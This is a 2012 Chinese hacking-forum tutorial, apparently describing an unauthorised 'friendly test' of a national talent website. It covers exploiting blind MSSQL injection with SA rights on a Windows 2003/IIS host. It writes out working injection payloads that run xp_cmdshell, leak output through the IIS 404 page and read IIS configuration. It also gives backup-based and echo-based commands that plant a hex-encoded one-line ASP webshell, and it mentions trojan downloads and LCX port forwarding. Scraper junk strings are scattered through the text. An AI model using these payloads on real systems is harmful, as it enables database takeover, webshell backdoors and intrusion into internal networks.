找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 sa权限的教程.
返回列表 发新帖
查看: 2880|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
2 J) V" A$ e& a- @+ [: k( E) W) H( {5 D2 |. d" u  g

" n, O, b" z1 F5 e" M% ]                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
4 Y! B0 o' J+ F' u2 f8 F5 A! v$ @/ Z2 z6 ^
                                                                 
. t1 d5 a- X/ b" t                                                                 ' @) a6 ]# m! }$ ?
                                                                  论坛: http://www.90team.net/  d/ ?2 p( i% f$ D6 t) E

6 T) [" |, V- O0 d1 C% M9 v1 T- g8 P9 b
$ d* k4 \+ V6 P
友情检测国家人才网
* ]  a9 c' O$ y- e/ N3 R$ I, E, j  @" `4 ^' y. A8 X1 z

4 B: {0 X' w4 V) n* t- U内容:MSSQL注入SA权限不显错模式下的入侵
6 P3 S$ C* h) p6 i2 C, a! e! t: K* j4 W1 \  @# S/ r$ l7 a% y, L

' A: k) {1 A1 N: g+ a一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。" ]# }5 U& m  T4 z+ b" ?2 {

/ \* c4 f4 H: i& x$ B! \6 K" r7 X我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。5 r) U3 _) t/ L: s. y2 |: {1 s' z3 f

$ X" l+ }: z6 [4 y5 |- x- {6 C3 U# K# K) S
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
, C, r' t# e. J* c3 s1 i$ p6 _3 K* d7 q
思路:4 j5 H# K6 y% I; Y# E9 t3 M
4 H$ G" U# ?0 L" x
首先:
/ ^! P/ D1 S2 t' l9 f. S$ _3 ]' J3 z3 F2 y) G* M3 A
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。/ \: S. Y. O+ c
; B& ]1 ^5 y2 W. q8 B; `
1.日志备份获得Webshell
5 n/ Z* h6 ~$ y' ]8 p# `$ E' `3 e* M  ]  `3 Y- Z
2.数据库差异备份获得Webshell; g7 b/ [: n" q1 r# P/ x9 z7 E( o

: z' g( s, I- H. |$ l( ~" p$ C) r4.直接下载免杀远控木马。
" C( m" g; ?5 }. w% l- M
) w2 m1 M( u$ y$ a0 x5 k5.直接下载LCX将服务器端口转发出来
. C3 d) ^/ w! m+ x, t0 G8 g) x7 P- [5 Z' r: }9 K: l0 ^; U! {6 E4 b
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。4 I* R' U- h7 t# |% ^( X- W
8 [/ \2 y" C( X4 D, I& U  \" t
6 E% _8 d9 T; _9 G7 i3 [

# U+ o( t, f$ p在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
3 K/ h& t3 A3 Y- h: [$ B5 x7 g4 r  ]$ \, L- o2 V
我直接演示后面一个方法
! k0 Z" l* {, B2 ^" ~7 V
; P. \& r: s: [& r7 v2 ?: W
( ?* j) @3 L+ d' G. y分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
& ~! B0 J% n! Z0 N8 _; ^: \/ G% E% s! F' a& m1 m
1 c, q# ]1 r: r# l" |! g: W$ g" Y4 M

5 a% n8 S) c' \! o1 k
* J0 f# s; X% N2 D( z◆日志备份:% P+ r' m  t: r8 E9 g+ f
/ G7 P0 E  p  D! J+ g3 ^0 }; U
7 Q7 R$ Y4 E& K% @2 T6 j8 c
1. 进行初始备份
8 V8 Z$ K$ o" E4 {# ^; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--' C" m% H: p; F! _4 p
5 A$ v& A* g& ~8 e6 h1 w
2. 插入数据/ N4 R. y3 j4 Y
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
1 a- F' q5 t1 W0 ]/ D
1 ^! k' c5 i) o6 N) d. q0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>4 l/ u4 ?. k7 H" ]
  " j- ^3 e$ x, u3 L2 l6 ~; @
3. 备份并获得文件,删除临时表, K; R( p" q5 e, r  P8 I4 G7 `( n
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--5 Z9 H/ |* a& `

. }1 b8 }8 M: P1 i1 [; v# U
! a+ m+ [: {9 d0 G. B% T8 c& N* t  }- Z3 |
◆数据库差异备份% ]9 H% q' p; p

' J% x% L0 V2 `1 u  B" J1 i(1. 进行差异备份准备工作. u3 o- m/ T7 S5 s( }. j, x

$ J* V5 g: O  V& I;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--5 H) t& d5 C2 r$ G0 Z* _

& _2 E/ s$ e+ p6 U: n! b, s* B- G1 i9 v0 ]上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码6 o( k. X# H" y( v- l

; W6 r% C% V6 N( G. C+ L7 Y( p. F1 H2 y; v
(2. 将数据写入到数据库# f/ w3 Z, B* p+ A6 k
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
& j& o7 m' A- U; b' q& D' B. P- a* X7 w0 k/ r5 s* k1 Y% [! y7 n
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
$ M4 F& T, d. e  K6 p4 z* k3 {7 w- f$ l2 ^0 b9 `4 b# {
3. 备份数据库并清理临时文件+ `" l. A3 J& d! [6 Y

: r& [  x6 e1 G9 D;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--" J3 W6 g+ T# ^0 u8 }9 \% [! l

% p3 j! v' U* q( h) t  {' {0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 3 f: j. h+ T  V' B" G3 A% i+ A

( s5 z: S6 G0 ]; [) a$ K" y; ?! _& ?7 {8 z0 ~% h' g

% u# w! {" k8 Q5 }8 d用^转义字符来写ASP(一句话木马)文件的方法:   ) K. u: O% x( O/ }% g
; k8 K' ]. v- U
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
' v6 l6 K! M; _0 l
5 A( p9 q, k4 [* a, z0 M2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp ; a4 {% B: T, C/ C

3 i( K( k8 a6 Q9 \& v& K7 J读取IIS配置信息获取web路径3 ]: V+ X# f4 E+ k+ T& t
& c; y: Y$ B; |0 h, U0 G
     
* N: [& `' a3 E     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--7 M0 G5 Q& N2 Z

- ~; D( _: ~0 p! v6 V. q1 o执行命令3 C) x, _% F% R! w9 |
     9 ~$ D7 g, G+ `( M
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
& @' m9 R( D; x* j( e" K) v! b2 t# U$ D+ R# x

5 b; H0 |1 _$ b3 z5 g6 ~( }4 z1 u9 J' h9 W2 D
5 H$ f1 I# a6 e0 S+ {- h

5 ?' X' \; b" |( f4 @7 [+ `! w. ^! j8 [1 X- a# _7 a

! A2 Q8 z3 G* P
/ b. `7 z, ?/ I: u! O4 h0 l4 I( t$ i5 }: C: u/ |* D
0 h2 p* r' v" _8 m; u) K+ [( u
1 O4 N* _# o4 S$ p

8 ?: ?# o7 N4 f; F& A# g* F
+ l  M1 g4 O2 }. O: d
8 R$ w/ g( X/ b0 J) A. C
) }: I5 \' e) K$ ], b+ o& C, u! ?7 N& A& u* d1 ~$ V

# O! ?/ [( j8 r) o, l* h  d
' u& A2 [- V% o; \  t# }$ l* q8 f  y0 H9 |: g% {8 @. v. L

" f+ {" t. \: ]) _& v8 B3 {. L! c. V: e. v6 B/ }# B1 v1 Z% B5 F+ `
+ o* s2 i8 X* q" t

4 d9 E& K) K6 _. B1 n2 `' ~0 c7 d6 {2 L

$ z* o* z% |; X2 l7 w- W; {& A3 e9 c- Y( P# ?5 ]3 [9 |- b  W

7 T. r1 t/ T8 s/ e3 g! E' S3 \+ s1 [! C, L3 o9 W

- n1 h$ N+ B5 n* k  z; [' L6 H) E! W  L

- y% Z- m3 @5 O# B
0 ]  u5 V1 _0 h  S" S6 I! D" P5 S  n1 l

7 M( g& n; l& ^$ a1 S* ~  d0 Q6 i

8 M2 s1 u0 J* j( O3 P3 u0 X2 w3 g" T# o( A  A1 k4 ^
. V) e: V, J; b
# n4 c9 Y; d* E& p% k0 `' W: w

3 _1 T( U4 F1 {* ^, x7 s8 z3 Y5 l4 o7 R3 i* O# V8 J
' J) }/ ~" `; T! C& u' @

5 s4 ~- k* H+ m+ E% t! x& W. q8 U6 e0 d* ~9 S' E& o9 [& [1 x
9 i, x; n2 |- q* Y  D" Z

% N7 e7 S* `* k8 f2 n% H7 U: ]# u7 F7 d+ A+ i3 V* e

+ Y5 f  s4 z# l1 d+ d7 S. p+ f. I
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表